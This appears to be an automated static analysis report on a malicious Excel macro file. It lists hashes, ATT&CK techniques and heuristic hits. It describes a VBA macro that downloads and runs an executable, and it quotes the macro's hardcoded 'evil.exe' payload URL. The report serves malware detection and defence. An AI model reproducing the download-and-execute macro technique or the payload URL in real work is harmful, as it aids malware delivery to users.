Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 16f6c6439c5b9712…

MALICIOUS

Office (OOXML) / .XLSM

44.1 KB Created: 2022-06-29 08:40:51 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2022-06-30
MD5: 52c29ebd718c8369dc6ab6b39762c796 SHA-1: 1329529bc7ab983c54e6be7392fb069b82a50f63 SHA-256: 16f6c6439c5b971218b9cd1d616ba40c7cad08c94984ecfde443dfa3c61c6152
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an XLSM file containing VBA macros. The critical heuristic OLE_VBA_DOWNLOAD and the presence of the URLDownloadToFileA function indicate the macro attempts to download a file from a hardcoded URL. The script reconstructs the URL as "http://137.123.128.127.134.133.076.seeds/evil.exe" and saves it to the temporary directory. The GetObject call and subsequent actions suggest the downloaded file is then executed.

Heuristics 4

  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
8012cacf36a788912ce9a7cb8034561aba0a18cc8d734dd5088e8c199b7c48ff		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2200 bytes
vbaProject_00.bin
e6ed5961d2e1cb7a9d005a1f8782c34288fb616a7075af14354fee73e00d2850		 vba-project OOXML VBA project: xl/vbaProject.bin 19968 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.